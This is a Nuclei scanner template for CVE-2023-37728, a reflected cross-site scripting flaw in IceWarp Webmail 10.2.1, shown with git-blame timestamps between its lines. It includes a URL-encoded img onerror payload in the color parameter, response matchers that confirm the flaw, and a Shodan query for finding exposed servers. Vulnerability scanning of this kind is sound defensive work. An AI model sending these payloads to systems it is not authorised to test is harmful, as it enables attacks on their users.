2023-10-16 18:24:57 +00:00
|
|
|
id: CVE-2023-37728
|
|
|
|
|
|
|
|
info:
|
2023-10-17 17:21:59 +00:00
|
|
|
name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting
|
|
|
|
author: technicaljunkie,r3Y3r53
|
2023-10-16 18:24:57 +00:00
|
|
|
severity: medium
|
|
|
|
description: |
|
2023-10-17 08:16:05 +00:00
|
|
|
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
|
2023-10-16 18:24:57 +00:00
|
|
|
reference:
|
2023-10-17 08:16:05 +00:00
|
|
|
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
|
2023-10-16 18:24:57 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
|
2023-10-17 17:52:26 +00:00
|
|
|
- http://icearp.com
|
|
|
|
- http://icewarp.com
|
2023-11-08 06:56:05 +00:00
|
|
|
- https://medium.com/%40ayush.engr29/cve-2023-37728-6dfb7586311
|
2023-10-16 18:24:57 +00:00
|
|
|
classification:
|
2023-10-17 06:11:14 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2023-10-16 18:24:57 +00:00
|
|
|
cvss-score: 6.1
|
2023-10-17 17:21:59 +00:00
|
|
|
cve-id: CVE-2023-37728
|
2023-10-16 18:24:57 +00:00
|
|
|
cwe-id: CWE-79
|
2023-10-17 17:52:26 +00:00
|
|
|
epss-score: 0.00081
|
2023-11-07 14:54:31 +00:00
|
|
|
epss-percentile: 0.33971
|
2023-10-17 17:21:59 +00:00
|
|
|
cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
|
2023-10-16 18:24:57 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-17 17:52:26 +00:00
|
|
|
max-request: 2
|
|
|
|
vendor: icewarp
|
|
|
|
product: icewarp
|
2023-10-17 08:16:05 +00:00
|
|
|
shodan-query: http.favicon.hash:2144485375
|
|
|
|
tags: cve,cve2023,icearp,icewarp,xss
|
2023-10-16 18:24:57 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2023-10-17 08:16:05 +00:00
|
|
|
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
|
|
|
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
2023-10-16 18:24:57 +00:00
|
|
|
|
2023-10-17 08:16:05 +00:00
|
|
|
stop-at-first-match: true
|
2023-10-16 18:24:57 +00:00
|
|
|
matchers:
|
2023-10-17 08:16:05 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code == 200'
|
|
|
|
- 'contains(content_type, "text/html")'
|
|
|
|
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
|
|
|
|
- 'contains(body, "<img src onerror=alert(document.domain)>")'
|
2023-10-16 18:24:57 +00:00
|
|
|
condition: and
|
2023-11-08 08:43:23 +00:00
|
|
|
# digest: 4a0a00473045022100f262605216394e1c8965a895148c39ba0fae7efabd30734b4535e09f5c98c39502206f04d5186c283ebd5f922e75c1ab0b667513c7c27e70ce65beeae87eb9ebd1df:922c64590222798bb761d5b6d8e72950
|